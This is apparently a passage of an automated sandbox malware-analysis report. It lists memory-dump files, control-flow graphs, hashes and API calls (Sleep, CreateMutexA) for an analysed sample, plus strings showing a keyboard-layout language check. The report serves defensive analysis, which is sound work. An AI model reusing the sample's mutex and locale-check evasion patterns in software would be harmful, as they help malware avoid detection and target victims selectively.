                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$Wce $Wce
                                                                                                                                                                                                        • API String ID: 0-519967073
                                                                                                                                                                                                        • Opcode ID: 2b7c92eef75ab492a97721e07663fc4f2913928045fd4df2d195d576497a0f59
                                                                                                                                                                                                        • Instruction ID: a0c340193441b29f3d22860af465f1c6e30225bd69825bdaa2c1f23a4759f296
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b7c92eef75ab492a97721e07663fc4f2913928045fd4df2d195d576497a0f59
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64F1C170900258AFEB24DF54CC85BDEBBBAEF44304F5086ADF509A7281DB759A84CF94

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 185 669ba5-669d91 call 677a00 call 665c10 call 668b30 call 678220
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: d518584114b22a6ff3d1089d1390bb59ad5883cf2657178e516470adf31363b2
                                                                                                                                                                                                        • Instruction ID: 27085835523e1c0cef69c802ff27d37b905eb381f0c1c581441b882fb3160e86
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d518584114b22a6ff3d1089d1390bb59ad5883cf2657178e516470adf31363b2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8315B71A04200DBEB08DB78DD89BADBB77EFC1314F308658E414A73D9C77559808761

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 207 669f44-669f64 211 669f66-669f72 207->211 212 669f92-669fae 207->212 213 669f74-669f82 211->213 214 669f88-669f8f call 67d663 211->214 215 669fb0-669fbc 212->215 216 669fdc-669ffb 212->216 213->214 217 66a92b 213->217 214->212 219 669fd2-669fd9 call 67d663 215->219 220 669fbe-669fcc 215->220 221 669ffd-66a009 216->221 222 66a029-66a916 call 6780c0 216->222 224 66a953-66a994 Sleep CreateMutexA 217->224 225 66a92b call 696c6a 217->225 219->216 220->217 220->219 228 66a01f-66a026 call 67d663 221->228 229 66a00b-66a019 221->229 236 66a996-66a998 224->236 237 66a9a7-66a9a8 224->237 225->224 228->222 229->217 229->228 236->237 239 66a99a-66a9a5 236->239 239->237
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: T2l
                                                                                                                                                                                                        • API String ID: 1464230837-1031808636
                                                                                                                                                                                                        • Opcode ID: 8e942c38c1f5136790919a3ab4d6ad5104d1d956235ad837d9443de6866a370c
                                                                                                                                                                                                        • Instruction ID: d6287ef3c27cc76d95c9f268226f7ceda5ab9e1efe660114285fbce817151f70
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e942c38c1f5136790919a3ab4d6ad5104d1d956235ad837d9443de6866a370c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17314A71614100DBEB189BB8DD88BACB777EF85314F308619E418EB3D5D73659808B62

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 241 66a079-66a099 245 66a0c7-66a0e3 241->245 246 66a09b-66a0a7 241->246 249 66a0e5-66a0f1 245->249 250 66a111-66a130 245->250 247 66a0bd-66a0c4 call 67d663 246->247 248 66a0a9-66a0b7 246->248 247->245 248->247 253 66a930-66a994 call 696c6a Sleep CreateMutexA 248->253 255 66a107-66a10e call 67d663 249->255 256 66a0f3-66a101 249->256 251 66a132-66a13e 250->251 252 66a15e-66a916 call 6780c0 250->252 257 66a154-66a15b call 67d663 251->257 258 66a140-66a14e 251->258 271 66a996-66a998 253->271 272 66a9a7-66a9a8 253->272 255->250 256->253 256->255 257->252 258->253 258->257 271->272 273 66a99a-66a9a5 271->273 273->272
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0066A963
                                                                                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
